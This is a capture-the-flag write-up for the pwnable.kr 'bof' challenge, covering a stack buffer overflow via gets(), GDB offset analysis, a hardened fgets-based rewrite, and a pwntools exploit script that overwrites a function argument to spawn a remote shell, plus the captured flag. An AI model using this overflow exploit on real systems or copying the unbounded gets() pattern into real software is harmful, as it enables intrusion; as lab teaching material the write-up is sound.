Pwnable.kr - bof

Challenge description:

Nana told me that buffer overflow is one of the most common software vulnerabilities. Is that true?

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}

int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

This is a classic stack buffer overflow challenge: the code reads user input into a 32-byte array with gets(), which performs no size checking at all, so the length of the input is bounded only by what the user sends.

So if we enter, say, a hundred characters, we overflow the overflowme array and write past it into whatever sits above it on the stack.

The goal of this challenge is to overwrite key with the value 0xcafebabe. On 32-bit x86 the function arguments are passed on the stack and sit at ebp+8, ebp+0xc, ...; there is only one argument, so we know it is at ebp+8 (note that on 64-bit systems the first function arguments are passed in registers instead).

Using GDB, we can disassemble func to know the exact offset of the input buffer array from the key argument.

gef➤  disassemble func 
Dump of assembler code for function func:
.....
   0x56555644 <+24>:	call   0xf7e2db70 <puts>
=> 0x56555649 <+29>:	lea    eax,[ebp-0x2c]
   0x5655564c <+32>:	mov    DWORD PTR [esp],eax
   0x5655564f <+35>:	call   0xf7e2d0c0 <gets>
=> 0x56555654 <+40>:	cmp    DWORD PTR [ebp+0x8],0xcafebabe
.....

Great, now we know the buffer is at offset 0x2c from ebp (44 bytes, more than the 32-byte array itself, which is why the offset is taken from the disassembly rather than assumed), so we need to send:

[0x2c bytes of padding to reach ebp + 4 bytes for the saved ebp + 4 bytes for the return address + the value 0xcafebabe, which lands at ebp+8, i.e. on key].
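As an added example (not the challenge's code and not part of the original write-up), here is the hardened shape of func(): the same 32-byte local, but gets() replaced by a bounded fgets()-based reader that truncates and drains overlong lines, so the bytes that would have reached saved ebp, the return address and key at ebp+8 never leave the read routine. The function names (read_line_bounded, func_hardened, read_from_string, run_payload_demo), the tmpfile()-based stream helper and the replayed payload bytes are all constructed here; the payload layout follows the one described above, and the shell spawn is replaced by a return value so the function can be tested.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define BUF_SIZE 32   /* same size as the challenge's overflowme[] */

/* Outcome of one bounded line read. */
typedef struct {
    size_t len;      /* bytes stored in dst, not counting the NUL */
    bool truncated;  /* the line was longer than the buffer and was cut */
} read_result;

/* Bounded replacement for gets(): stores at most cap-1 bytes, always
 * NUL-terminates, strips the trailing newline, and drains the rest of an
 * overlong line so it cannot spill into the next read. */
read_result read_line_bounded(char *dst, size_t cap, FILE *in) {
    read_result r = { 0, false };
    if (cap == 0 || dst == NULL) return r;
    dst[0] = '\0';
    if (fgets(dst, (int)cap, in) == NULL) return r;   /* EOF or error */
    r.len = strlen(dst);
    if (r.len > 0 && dst[r.len - 1] == '\n') {
        dst[--r.len] = '\0';                           /* complete line */
    } else {
        /* No newline stored: either EOF or the line did not fit. */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n') r.truncated = true;
    }
    return r;
}

/* Hardened shape of the challenge's func(): same 32-byte local, but the
 * read is bounded, so an overlong line cannot reach saved ebp, the return
 * address or the key argument. Returns 1 where the original would call
 * system("/bin/sh") and 0 where it would print "Nah.."; the truncation
 * flag is exposed so a caller can log oversized input. */
int func_hardened(int key, FILE *in, bool *truncated) {
    char overflowme[BUF_SIZE];
    read_result r = read_line_bounded(overflowme, sizeof overflowme, in);
    if (truncated) *truncated = r.truncated;
    return key == (int)0xcafebabe;
}

/* Presents the string s as a stream and reads one bounded line from it.
 * tmpfile() is used so no platform-specific memory streams are needed. */
read_result read_from_string(const char *s, char *dst, size_t cap) {
    read_result r = { 0, false };
    FILE *f = tmpfile();
    if (f == NULL) return r;
    fputs(s, f);
    rewind(f);
    r = read_line_bounded(dst, cap, f);
    fclose(f);
    return r;
}

/* Replays a constructed copy of the write-up's 56-byte payload (0x2c bytes
 * of padding, 4 bytes for saved ebp, 4 for the return address, then
 * 0xcafebabe little-endian) against func_hardened with key = 0xdeadbeef,
 * as the challenge binary calls it. Returns bit 0 set if key was seen as
 * 0xcafebabe, bit 1 set if the input was truncated, -1 on I/O failure. */
int run_payload_demo(void) {
    char payload[64];
    memset(payload, 'A', 0x2c);
    memset(payload + 0x2c, 'X', 8);
    memcpy(payload + 0x2c + 8, "\xbe\xba\xfe\xca", 4);  /* p32(0xcafebabe) */
    payload[56] = '\n';

    FILE *f = tmpfile();
    if (f == NULL) return -1;
    fwrite(payload, 1, 57, f);
    rewind(f);
    bool truncated = false;
    int matched = func_hardened((int)0xdeadbeef, f, &truncated);
    fclose(f);
    return matched | (truncated ? 2 : 0);
}

int main(void) {
    int res = run_payload_demo();
    printf("key matched: %d, input truncated: %d\n", res & 1, (res >> 1) & 1);
    return 0;
}
```

Run stand-alone, it replays the 56-byte payload and reports that key is still not 0xcafebabe while the input was flagged as truncated. That flag is the part worth keeping in a real service: a line longer than 31 bytes on this prompt is itself a signal, and draining the remainder ensures an attacker's trailing bytes are not handed to the next read either.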

Solution:

# solve.py

from pwn import *

p = remote('pwnable.kr', 9000)

buf = b""
buf += b'A' * 0x2c        # padding up to ebp (buffer sits at ebp-0x2c)
buf += b'XXXX'            # saved ebp
buf += b'XXXX'            # return address
buf += p32(0xcafebabe)    # value that overwrites key at ebp+8

p.sendline(buf)           # gets() reads up to the newline
p.interactive()           # for interactive shell

$ python2 solve.py
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode

$ ls
bof
bof.c
flag
log
log2
super.pl

$ cat flag
daddy, I just pwned a buFFer :)

Flag: daddy, I just pwned a buFFer :)